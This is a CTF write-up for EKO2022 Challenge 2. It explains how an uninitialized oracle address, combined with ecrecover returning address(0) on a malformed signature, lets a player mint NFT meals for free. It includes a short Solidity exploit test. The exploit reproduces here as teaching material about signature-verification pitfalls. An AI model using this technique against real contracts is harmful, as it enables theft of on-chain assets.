Emanuele Ricci
EKO2022 Enter the metaverse CTF Challenge 2 — Metaverse Supermarket
This is Part 2 of the series "Let's play EKO2022 Enter the metaverse CTF"
EKO2022 Enter the metaverse is a collection of challenges made for the EKOparty 2022 submitted by some gigabrain hackers; @Br0niclΞ, @nicobevi.eth, @matta, @tinchoabbate, @adriro, @bengalaQ, @chiin, @Rotciv, @Bahurum and @0x4non.
This is a simple experiment of the Proof of Hack Protocol. It's a mix between classical blockchain challenges, and new ones, it's permissionless, this page will curate some of them.
After you break each challenge, you can claim a soulbound NFT on polygon.
Challenge #2 — Metaverse Supermarket
We are all living in the Inflation Metaverse, a digital world dominated by the INFLA token. Stability has become a scarce resource and even going to the store is a painful experience: we need to rely on oracles that sign off-chain data that lasts a couple of blocks because updating prices on-chain would be complete madness.
You are out of INFLAs and you are starving, can you defeat the system?Challenge url: Metaverse Supermarket Challenge author: adriro
The attacker end goal
Our goal is to be able to mint tons of Meal
(well, at least 10 according to what I can see in the isComplete
checks of the ChallengeMetaverseSupermarketFactory
😄). It won't be easy because each meal costs 1e6 tokens (1000000) and only owns 10 of them 😐.
Study the contracts
Challenge Factory Contract
This part is important to be able to understand
- What has been deployed
- Which parameters
- What contracts could we interact with?
- What the challenge, check to see if we have solved it
By looking at the ChallengeMetaverseSupermarketFactory
we see that the deploy
function just takes the _player
address and returns the InflaStore
instance as the only value we can directly manipulate
function deploy(address _player) external payable override returns (address[] memory ret) {
require(msg.value == 0, "dont send ether");
address _challenge = address(new InflaStore(_player));
ret = new address[](1);
ret[0] = _challenge;
_challengePlayer[_challenge] = _player;
Completion checks
In the isComplete
function of the factory, it checks that the player
was able to mint and own at least 10 Meal
function isComplete(address[] calldata _challenges) external view override returns (bool) {
return IERC721(address(InflaStore(_challenges[0]).meal())).balanceOf(_challengePlayer[_challenges[0]]) >= 10;
This contract represents the ERC20 token used to buy Meal
(what we eat in the metaverse, apparently). It's a pretty standard ERC20 token based on the Solmate implementation.
When the contract is deployed, it mints amount
of wei to the player
Also this contract seems to be pretty standard. It's a normal ERC721 token, based on the Solmate implementation.
The safeMint
function is protected and can be executed only by the _owner
of the contract. It just mints a Meal
NFT and sends it to the to
One thing that we can note is that it uses the _safeMint
function that could lead to some re-entrancy attacks (it always depends on how it's used by the caller)
This contract inherit from EIP712 contract (from OpenZeppelin). The contract implements the EIP-712: Typed structured data hashing and signing EIP, and will be used by the InflaStore
contract to get the hash of a OraclePrice
Nothing special to see here
The contract inherit from InflaStoreEIP712
to offer support to the EIP712
Let's look at the variables and the constructor of the contract
Meal public immutable meal;
Infla public immutable infla;
address private owner;
address private oracle;
uint256 public constant MEAL_PRICE = 1e6;
uint256 public constant BLOCK_RANGE = 10;
constructor(address player) EIP712("InflaStore", "1.0") {
meal = new Meal();
infla = new Infla(player, 10);
owner = msg.sender;
From the state variables, we can see that it stores an immutable reference to both the meal
NFT contract and the infla
ERC20 contract. The Infla tokens are used by the end user to purchase the meals.
Then we have the owner
and the oracle
reference. Each meal will cost 1e6
wei of Infla
to purchase one meal.
In the constructor
of the contract it initializes the EIP712
inherited contract, creates a new Meal
contract, a new Infla
contract (it will mint 10
wei of Infla to the player
) and set the owner equal to the deployer.
Have you spotted something odd? Well, the oracle
address has not been initialized... Let's keep going and look at all the other functions.
allows the owner to update the oracle
function setOracle(address _oracle) external {
require(owner == msg.sender, "!owner");
oracle = _oracle;
is a private
function used by the buy
and buyUsingOracle
functions. It transfers the current price
to buy a Meal
to this contract and mint the Meal
to the buyer
function _mintMeal(address buyer, uint256 price) private {
infla.transferFrom(buyer, address(this), price);
The safeMint
function, as we saw, could lead to a re-entrancy attack, but in this case, I would say that we should be safe, given that we have already transferred the user's balance.
Now let's look at the buy
function buy() external {
_mintMeal(msg.sender, MEAL_PRICE);
it can be called by anyone and allows the user to buy a Meal
for 1e6
Then we have a more interesting function... buyUsingOracle
allows anyone to purchase a Meal
with the price that should have been signed by the oracle. That price can be any value, so you could end up by purchasing a Meal
for more than the default price (I doubt that you would like to overpay for it, right?) or for a lower one. Even for zero!
function buyUsingOracle(OraclePrice calldata oraclePrice, Signature calldata signature) external {
_validateOraclePrice(oraclePrice, signature);
_mintMeal(msg.sender, oraclePrice.price);
But before being able to do this special purchase, it must pass the _validateOraclePrice
validation step that verifies that the oraclePrice
has been properly signed by the oracle
and that the time (block.number
) reference of the price is not too old. Prices that are older than 10 days ago will not be accepted!
function _validateOraclePrice(OraclePrice calldata oraclePrice, Signature calldata signature) private view {
require(block.number - oraclePrice.blockNumber < BLOCK_RANGE, "price too old!");
bytes32 oracleHash = _hashOraclePrice(oraclePrice);
address recovered = _recover(oracleHash, signature.v, signature.r, signature.s);
require(recovered == oracle, "not oracle!");
After checking that the price is not too old, the function verifies that the oracle
was the one signing the price. You can't trust anyone, right?
The first thing that the contract do is to re-recreate the hash
of the message. After that, it will try to recover from the hash
and the v
, r
, and s
signature parameter who was the signer. If the signer is equal to the oracle
everything is fine, and we can proceed to use the new price
for the mint; otherwise it will revert the transaction.
I think that you can already see where's the problem here, right? But first I want to show you another one. The contract is not validating in any way the order of the prices. If a signature is valid, they just use the price without checking for which time period it was right.
Just to make an example. The oracle sign a price for DAY 3
and another one for DAY 4
. Both prices are valid for this function logic and will pass the validation until they "expire". But as you can understand, only the newest one should be possible to be used; otherwise you could be able to use a lower price that is older compared to the latest price that has been used to mint the last Meal
Ok, now back on the track. Let's see how the _recover
function is made
function _recover(bytes32 digest, uint8 v, bytes32 r, bytes32 s) internal pure returns (address) {
require(v == 27 || v == 28, "invalid v!");
return ecrecover(digest, v, r, s);
Let's do a brief explanation about the ecrecover
function. From the Solidity Docs about the ecrecover we know that
ecrecover(bytes32 hash, uint8 v, bytes32 r, bytes32 s) returns (address)
is a native function used to recover the address associated with the public key from elliptic curve signature or return zero on error. The function parameters correspond to ECDSA values of the signature:
= first 32 bytes of signatures
= second 32 bytes of signaturev
= final 1 byte of signature
Under the explanation, there's also a huge warning:
If you use
, be aware that a valid signature can be turned into a different valid signature without requiring knowledge of the corresponding private key. In the Homestead hard fork, this issue was fixed for transaction signatures (see EIP-2), but the ecrecover function remained unchanged.This is usually not a problem unless you require signatures to be unique or use them to identify items. OpenZeppelin have a ECDSA helper library that you can use as a wrapper for
without this issue.
I think that it is safe to say that the InflaStore
contract is a lot bugged. The only check that is done is that v
is valid, but after that, they only check that oracle == ecrecover(digest, v, r, s)
They are ignoring the fact that, as the documentation says, ecrecover
could return address(0)
in case of an error!
Now, if you remember both the ChallengeMetaverseSupermarketFactory.deploy
function and the InflaStore
do not initialize the oracle contract...
This means that right now oracle == address(0)
and every call to _validateOraclePrice
that simply fails to validate the signature will make the function pass!
To complete the challenge, we just need to call the buyUsingOracle
with a zero price signed by something that will make the ecrecover
fail to retrieve the signer address!
Let's go! Free meals for everyone!!!
Solution code
Now that we know what we have to do, we can simply write down the solution code and execute it
Here's the code of our custom smart contract
contract MetaverseSupermarketTest is EkoBaseTest {
InflaStore store;
function preSetupHook() internal override {
// Init the challenge
factory = new ChallengeMetaverseSupermarketFactory();
challenges = factory.deploy(player);
store = InflaStore(challenges[0]);
function runExploit() internal override {
// When a new `InflaStore` is created, the contract does not initialize the `oracle` address
// the `ChallengeMetaverseSupermarketFactory` factory never call the `setOracle` method updating the oracle
// So `oracle` remain with the default value that is `address(0)`
// Now if you have followed all my previous CTF blog posts you should already know how ECDSA works
// Inside the `_validateOraclePrice` function of `InflaStore` (used to validate the oracle price signature)
// they checks two things
// 1) the `v` value must be equal to 27 or 28 (checked internally by `_recover` for signature malleability)
// 2) the `signer` of the message must be equal to the `oracle`
// The problem is that `ecrecover` (an EVM precompiled function) will not cover all the security checks
// you should do as a smart contract developer. The only role of that function is to return
// the return the address from the given signature by calculating a recovery function of ECDSA.
// Basically, given a signature (v, r, s) and a signed message it returns who has signed it.
// When the function fails to do that (malformed hash, invalid signature and so on)
// it will return `address(0)` that should be treated as an error and revert immediately
// To solve the challenge, we just need to be able to set the oracle price of the Meal
// to be equal to zero and execute some free mint (well will still pay for gas but still...)
// Create an Oracle Price using the current block number in order to be able to execute the transaction
// without reverting (`_validateOraclePrice` reverts if the price is too old)
// and set the oracle price to zero (free mint yay!)
OraclePrice memory oraclePrice = OraclePrice({
blockNumber: block.number,
price: 0
// Now we build a signature that just need to pass the `v` test (it can be only 27 and 28)
// And fail all the `ecrecover` internal test to make it returns `address(0)`
Signature memory signature = Signature({
v: 27,
r: bytes32(""),
s: bytes32("")
// Now that we have prepared the ground we can just simply start minting our free Meals!
// Note that we could mint those in an infinite loop because now the price is zero!
for( uint i = 0; i < 20; i++ ) {
store.buyUsingOracle(oraclePrice, signature);
You can read the full solution of the challenge opening MetaverseSupermarket.t.sol.
Further reading
- Vitalik Buterin: Exploring Elliptic Curve Pairings
- Immunify: Intro to Cryptography and Signatures in Ethereum
- Alex Papageorgiou - B002: Solidity EC Signature Pitfalls
- Solidity Developer: What is ecrecover in Solidity?
- Ethereum EIP-191: Signed Data Standard
- Ethereum EIP-712: Typed structured data hashing and signing
- EIP-2612: Permit - 712-signed approvals (a good example of an applied case of signature usage)
- SWC-122: Lack of Proper Signature Verification
- SWC-121: Missing Protection against Signature Replay Attacks
- SWC-117: Signature Malleability
- OpenZeppelin ECDSA, SignatureChecker and EIP712
All Solidity code, practices and patterns in this repository are DAMN VULNERABLE and for educational purposes only.
I do not give any warranties and will not be liable for any loss incurred through any use of this codebase.